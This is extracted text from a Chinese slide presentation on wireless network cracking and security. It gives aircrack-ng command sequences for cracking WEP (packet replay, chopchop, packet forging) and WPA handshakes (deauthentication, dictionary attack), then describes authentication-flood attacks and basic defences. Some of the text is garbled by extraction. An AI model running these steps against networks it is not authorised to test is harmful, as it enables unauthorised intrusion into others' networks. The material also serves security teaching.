《电脑知识无线破解和安全》由会员分享,可在线阅读,更多相关《电脑知识无线破解和安全(14页珍藏版)》请在金锄头文库上搜索。
1、无线的破解与安全 提纲 n相关背景 nWEP的破解(1) nWPA的破解 n无线安全 相关背景 n无线网卡的选择 l芯片。Athetos ,Prism,Ralink (USB) l无线网卡的硬件/固件版本 l无线网卡的功率及规格 n基本知识 lSSID(Service Set Identifier,服务集标识符) 一个唯一的标识符,最大长度32 lWAP(wireless Application Protocol,无线应用 协议) lAP(wireless Access Point) 无线接入点 相关背景 n几个比较好的无线破解系统(Linux ) lBackTrack lWiFiSlax l
2、WiFiWay nLinux系统下无线探测工具 lKismet(Bt4自带) lWicrawl(扩展功能较好) lAirSnort(具有自动抓包并破解WEP的能力) lBt4下使用iwlist或者 相关背景 n几个比较出名linux系统 lBackTrack lWiFiSlax lWiFiWay nLinux系统下无线探测工具 lKismet(Bt4自带) lWicrawl(扩展功能较好) lAirSnort(具有自动抓包并破解WEP的能力) lBt4下使用iwlist或者Internet-Wicd Network Manager 相关背景 n几个比较出名linux系统 lBackTrack
3、lWiFiSlax lWiFiWay nLinux系统下无线探测工具 lKismet(Bt4自带) lWicrawl(扩展功能较好) lAirSnort(具有自动抓包并破解WEP的能力) lBt4下使用iwlist或者Internet-Wicd Network Manager WEP破解技术(1) nIfconfig a wlan0 up l载入无线网卡的驱动程序 l首先要在vmware中连接 n探测无线AP的信息 nairmon-ng start wlan0 监控频道 l成功后会开启一个监控网卡,如 mon0 nairodumpng w dump channel 6 mon0 nairepl
4、ay-ng -3 b aps MAC h clients MAC x 1024 mon0 naircrack-ng x f 2 dump-01.cap WEP破解技术(2) nIfconfig a wlan0 up l载入无线网卡的驱动程序 l首先要在vmware中连接 n探测无线AP的信息 nairmon-ng start wlan0 监控频道 l成功后会开启一个监控网卡,如 mon0 nairodump ng ivs c 监控频道w dump channel 6 mon0 naireplay-ng -1 0 e aps essid aps MAC h clients MAC (网卡) x
5、mon0 WEP破解技术(2) naireplay-ng -4 b APs MAC h clients MAC mon0 lChopchop 攻击 l生产可用的密钥数据流文件 l会生产一个cap和一个xor的文件 npacketforge-ng o a APMAC h clients MAC - k 255.255.255.255 -1 255.255.255.255 y fragment xor file w dump1 nairepaly-ng -2 r dump1 mon0 naircrack-ng dump*.ivs WAP破解技术 n airmon-ng start wlan0 l没
6、有正常的加载驱动 n airodump-ng -w dump channel 频道 mon0 lDump为数据包 n aireplay-ng -o 攻击次数 APs MAC h clients MAC mon0 lWPA握手的验证 n zcat /pentest/password/dictionaries/ wordlist.txt.Z password.txt l生产字典(bt4 自带) n aircrack-ng w password.txt -z dump01.cap l破解 WEP破解流程 无线的安全 身份验证洪泛攻击 n攻击原理 l关联的客户端向AP发送大量伪造身份验证请求 l当请求超出AP的承载能力时断开与客户的连接 n攻击实现 l使用看似合法的但是随机生成MAC伪造工作站 l向AP发送大量的虚假请求 总结 n尽量使用相对安全的防御措施 l隐藏无线局域网的SSID号码 l使用WPA加密 l实施MAC地址过滤 l进行802.1x认证 n控制无线信号的范围